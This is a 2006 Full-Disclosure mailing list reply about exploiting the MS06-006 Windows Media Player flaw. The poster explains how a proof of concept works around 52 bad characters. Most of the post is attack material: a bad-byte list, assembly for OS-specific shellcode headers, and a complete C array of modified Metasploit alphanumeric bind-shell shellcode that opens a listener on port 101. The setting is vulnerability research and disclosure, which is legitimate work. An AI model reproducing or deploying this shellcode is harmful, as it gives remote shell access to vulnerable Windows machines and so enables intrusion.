Full Disclosure mailing list archives
Re: MS06-06 Windows Media Player Exploitation
From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Thu, 16 Feb 2006 23:45:03 +0100
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 not sure about what you are looking for but read this below , it's from an unpublished poc where I had to trick with 52 badchars: - -------------------------------------------------------------------------------------------- 52 BADCHARS: 0x00 0x22 0x61 0x62 0x63 0x64 0x65 0x66 0x67 0x68 0x69 0x70 0x71 0x72 0x73 0x74 0x75 0x76 0x77 0x78 0x79 0xE0 0xE1 0xE2 0xE3 0xE4 0xE5 0xE6 0xE7 0xE8 0xE9 0xEA 0xEB 0xEC 0xED 0xEE 0xEF 0xF0 0xF1 0xF2 0xF3 0xF4 0xF5 0xF6 0xF8 0xF9 0xFA 0xFB 0xFC 0xFD 0xFE 0xFF Due to the high number of bad chars, especially an upper/lower case conflict, I have used the msf bind shellcode port 101 with the PexAlphaNum encoder. EB 03 JMP SHORT 0012EE63 59 POP ECX EB 05 JMP SHORT 0012EE68 E8 F8FFFFFF CALL 0012EE60 But it contains 7 bad chars as you can see, so another way is (for 2k): 83C3 1C ADD EBX,1C 53 PUSH EBX 59 POP ECX Because ebx+1c is a fixed addr pointing were the alphanum shellcode starts, and so on, is popped to ecx correctly, and 0 badchars. And the one for XP sp1 (because no more direct pointer where I need, but I found near the dword of a reg): 834424 08 1C ADD DWORD PTR SS:[ESP+8],1C 895C24 08 MOV EBX,DWORD PTR SS:[ESP+8] 53 PUSH EBX 59 POP ECX - ------------------------------------------------------------------------------------------------ /*modded metasploit bindshellcode port 101*/ char scode1[]= "\x90\x90\x90\x90\x90\x83\xC3\x1C\x53\x59" /*upon this text is the modded header for 2k, it changes depending the OS you exploit, read my exploit's header or debug for much informations, this is how I trick with 52 badchars... thks to msf guys for all the rest, this is a great alphanum uppercase shellcode really appreciated here :)*/ "\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e" "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58" "\x4e\x36\x46\x42\x46\x32\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37" "\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48" "\x4f\x45\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x48" "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c" "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x42\x45\x47\x45\x4e\x4b\x48" "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x54" "\x4b\x38\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38" "\x49\x58\x4e\x56\x46\x32\x4e\x41\x41\x46\x43\x4c\x41\x53\x4b\x4d" "\x46\x36\x4b\x48\x43\x44\x42\x43\x4b\x48\x42\x44\x4e\x30\x4b\x38" "\x42\x47\x4e\x31\x4d\x4a\x4b\x58\x42\x44\x4a\x50\x50\x55\x4a\x36" "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56" "\x43\x55\x48\x56\x4a\x56\x43\x33\x44\x53\x4a\x56\x47\x37\x43\x57" "\x44\x53\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x48\x45\x4e" "\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50" "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35" "\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x55\x43\x35\x43\x55\x43\x34" "\x43\x35\x43\x34\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x42\x30" "\x45\x56\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a" "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x51" "\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d" "\x4a\x56\x45\x4e\x49\x54\x48\x48\x49\x44\x47\x35\x4f\x4f\x48\x4d" "\x42\x45\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46" "\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x36\x48\x46\x4a\x36\x43\x56" "\x4d\x46\x49\x38\x45\x4e\x4c\x36\x42\x45\x49\x45\x49\x52\x4e\x4c" "\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x48\x44\x4e\x41\x53\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x44\x4e\x52" "\x43\x49\x4d\x48\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x54\x4f\x4f" "\x48\x4d\x4b\x45\x47\x35\x44\x45\x41\x55\x41\x35\x41\x35\x4c\x46" "\x41\x30\x41\x55\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x36" "\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36" "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f" "\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" "\x4a\x36\x50\x57\x4a\x4d\x44\x4e\x43\x37\x43\x45\x4f\x4f\x48\x4d" "\x4f\x4f\x42\x4d\x5a"; c0ntex wrote:
No exploit, just some basic research - anyone with 100% Ascii win32
shellcode?
http://open-security.org/winmedia/index.html -- regards c0ntex _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ/UAb6+LRXunxpxfAQKY9Q//dxNp9p3Q1AzHMbvHrirmwUGDVc1Q1tdF lR8EQvxImsMokCKUKReHaJSG2SpGdjacTBVJLIOYYQLt2efvc2C/j+OlaHC+Egna Fvlyhyb+ACSorUtewXzMv4B9ydcVkJsEgZqbht2iundzgK22mC93zpucGOXWIVMZ AMam5Hw9uGU6R5jgUxicV3XrU18TCOZIknTfgYuL7FUYF8foEhfwiGXPlVcFaSwE 3h1uudpbSSOgfIccrZkDnmxJ98Myli0NQ7uZ17Mcx2bYNN5p2895Mslkm8WIdloB Rp4HgJEbCYzQOdExF6W2tdERq8HUe8bPW5qOGI7FhQRrhei7LvF7LSZTW2Icl2QH GaRMNe3tcczGnQRAor2tUOT6go9CgV60QnoDljwAetuGRDuUZFw2RZnREFSQU5WU YjS/yfk84Gp4BLJtefSWmvDdYe2Y5+zaRJqDeRoEhN41pBf0az/gZYJ07f1ybHyd CKY6xtW5vtIe8tlWRsG7NBVV3Ug3Qxk4BuXGAtccJ/kO+aLu/3HgOsKwrpJnkdsK DJSDwBWdr17YDh1VIfZZaHoDZA45xcOklf7ZGkgUsdDE8Kl3mxSLPHdSxdRpCqVx FWf+3eyQZbvSkH81eJnLBAWG/7ojjRNRV+JjRwvMwwGstSjfKZCve9C05fGNpsD4 g1w1TdV1nR0= =vOSt -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] Matthew Murphy (Feb 17)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)